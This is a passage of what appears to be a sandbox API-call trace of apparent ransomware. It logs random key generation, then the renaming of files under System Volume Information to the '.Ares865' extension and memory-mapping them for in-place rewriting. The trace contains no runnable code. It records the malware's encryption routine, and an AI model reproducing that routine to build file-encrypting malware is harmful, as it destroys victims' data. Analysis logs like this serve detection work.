returned 1 [0113.051] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.052] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.052] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.053] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.058] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.059] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.059] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.060] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.Ares865") returned 111 [0113.060] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.062] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.062] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0113.062] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.063] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.063] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.063] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0113.065] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0113.065] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.066] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.066] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.067] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.Ares865") returned 111 [0113.067] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.068] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.068] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.068] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.069] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.069] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.069] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.070] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.074] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.075] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.075] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.076] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.Ares865") returned 111 [0113.076] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.085] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.087] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=376) returned 1 [0113.087] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.096] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.096] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.096] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x480, lpName=0x0) returned 0x170 [0113.098] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x190000 [0113.099] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.100] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.100] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.100] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_DriverPackageInfo.Ares865") returned 111 [0113.100] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.102] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.102] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.102] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.103] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.103] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.103] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.104] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.107] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.108] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.108] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.109] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_WindowsUpdateInfo.Ares865") returned 111 [0113.109] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.110] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.110] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0113.111] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.111] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.111] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.112] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0113.113] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0113.114] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.115] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.115] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.115] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{C3F59859-DD84-4710-B6BE-740F016AD023}_DriverPackageInfo.Ares865") returned 111 [0113.115] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C3F59859-DD84-4710-B6BE-740F016AD023}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c3f59859-dd84-4710-b6be-740f016ad023}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C3F59859-DD84-4710-B6BE-740F016AD023}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c3f59859-dd84-4710-b6be-740f016ad023}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.117] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C3F59859-DD84-4710-B6BE-740F016AD023}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c3f59859-dd84-4710-b6be-740f016ad023}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.117] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.117] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.118] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.118] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.118] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.119] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.123] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.123] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.123] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.124] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{C3F59859-DD84-4710-B6BE-740F016AD023}_WindowsUpdateInfo.Ares865") returned 111 [0113.125] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C3F59859-DD84-4710-B6BE-740F016AD023}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c3f59859-dd84-4710-b6be-740f016ad023}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C3F59859-DD84-4710-B6BE-740F016AD023}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c3f59859-dd84-4710-b6be-740f016ad023}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.126] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C3F59859-DD84-4710-B6BE-740F016AD023}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c3f59859-dd84-4710-b6be-740f016ad023}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.126] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0113.126] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.127] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.127] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.127] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0113.129] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0113.130] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.131] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.131] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.131] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{C4C23D0F-5069-470F-9760-27EB797F66C2}_DriverPackageInfo.Ares865") returned 111 [0113.131] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C4C23D0F-5069-470F-9760-27EB797F66C2}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C4C23D0F-5069-470F-9760-27EB797F66C2}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.133] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C4C23D0F-5069-470F-9760-27EB797F66C2}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.134] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.134] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.134] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.134] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.135] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.137] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.139] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.140] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.140] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.141] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{C4C23D0F-5069-470F-9760-27EB797F66C2}_WindowsUpdateInfo.Ares865") returned 111 [0113.141] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C4C23D0F-5069-470F-9760-27EB797F66C2}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C4C23D0F-5069-470F-9760-27EB797F66C2}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.142] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C4C23D0F-5069-470F-9760-27EB797F66C2}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.142] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0113.143] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.143] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.143] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.143] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0113.149] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0113.150] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.150] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.150] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.151] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_DriverPackageInfo.Ares865") returned 111 [0113.151] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.152] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.152] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.152] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.153] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.153] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.153] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.156] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.159] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.160] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.160] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.161] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_WindowsUpdateInfo.Ares865") returned 111 [0113.161] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume 